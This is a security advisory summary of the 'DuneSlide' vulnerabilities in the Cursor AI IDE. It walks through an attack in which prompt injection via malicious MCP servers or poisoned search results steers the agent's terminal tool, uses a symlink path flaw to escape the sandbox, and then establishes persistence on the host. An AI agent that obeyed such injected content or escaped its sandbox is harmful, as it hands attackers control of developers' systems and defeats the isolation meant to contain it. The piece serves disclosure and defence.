Researchers at Cato Networks have identified "DuneSlide," a pair of critical vulnerabilities (CVE-2026-50548 and CVE-2026-50549) in the Cursor AI IDE. These flaws enable prompt-injection-driven sandbox escapes, escalating from LLM interactions to full operating system-level Remote Code Execution (RCE). Attackers can leverage malicious Model Context Protocol (MCP) servers or poisoned web search results to manipulate the run_terminal_cmd tool and bypass path canonicalization logic via symbolic links. Successful exploitation allows unauthorized file writes outside the project root, enabling attackers to overwrite the cursorsandbox executable, modify shell configurations, or establish persistence via macOS LaunchAgents, resulting in total system compromise.
-
Threat Model: AI-Agentic Exploitation
- Leverages "agentic AI" capabilities where the LLM interacts with external data sources like MCP servers or web results.
- Utilizes prompt injection to steer the AI agent into executing unauthorized system commands.
- Targets the isolation layer designed to restrict AI operations to the user's project directory.
-
Technical Deep Dive: Escape Mechanics
- Command Tool Manipulation: Exploits the
run_terminal_cmdtool via a programmable override of theworking_directoryparameter. - Path Canonicalization Flaw: Logic failures during symlink canonicalization allow the system to fall back to original paths, bypassing project root verification.
- Sandbox Bypass: Enables the movement from a restricted environment to the underlying host operating system.
- Command Tool Manipulation: Exploits the
-
Impact: Persistence and System Compromise
- Scope of Impact: High-severity, full OS-level compromise with low attack complexity.
- Persistence Vectors: Attackers can deploy malicious startup agents in
~/Library/LaunchAgents(macOS) or modify shell configuration files. - Binary Overwriting: Capability to overwrite the
cursorsandboxexecutable to maintain long-term control. - Target Profile: Enterprise developers and Fortune 500 organizations utilizing AI-integrated IDEs.
-
Mitigation: Remediation Requirements
- Immediate Action: All users must update to Cursor IDE version 3.0 or later to resolve the vulnerabilities.
- Input Validation: Organizations should scrutinize the use of third-party MCP servers and untrusted web-integrated AI tools.
- Endpoint Monitoring: Monitor for unauthorized changes to shell profiles and the creation of new system-level LaunchAgents.
Related posts
- threat-modeling.com — Cursor IDE Critical Zero-Click Remote Code Execution Vulnerabilities — AI-Powered Development Environment Used by Fortune 500
- SecurityWeek — Critical Cursor AI Code Editor Flaws Could Lead to OS-Level Remote Code Execution
- feeds.feedburner.com — Critical Cursor Flaws Could Let Prompt Injection Escape Sandbox and Run Commands
- csoonline.com — Sandbox bypass flaws in Cursor IDE highlight prompt injection as an RCE vector
- Blog
- Pillar
- Catonetworks
- Tenable
- Truefoundry
- Ground
- Aiweekly
- Medium
- Radar
- Devsecopsdadattack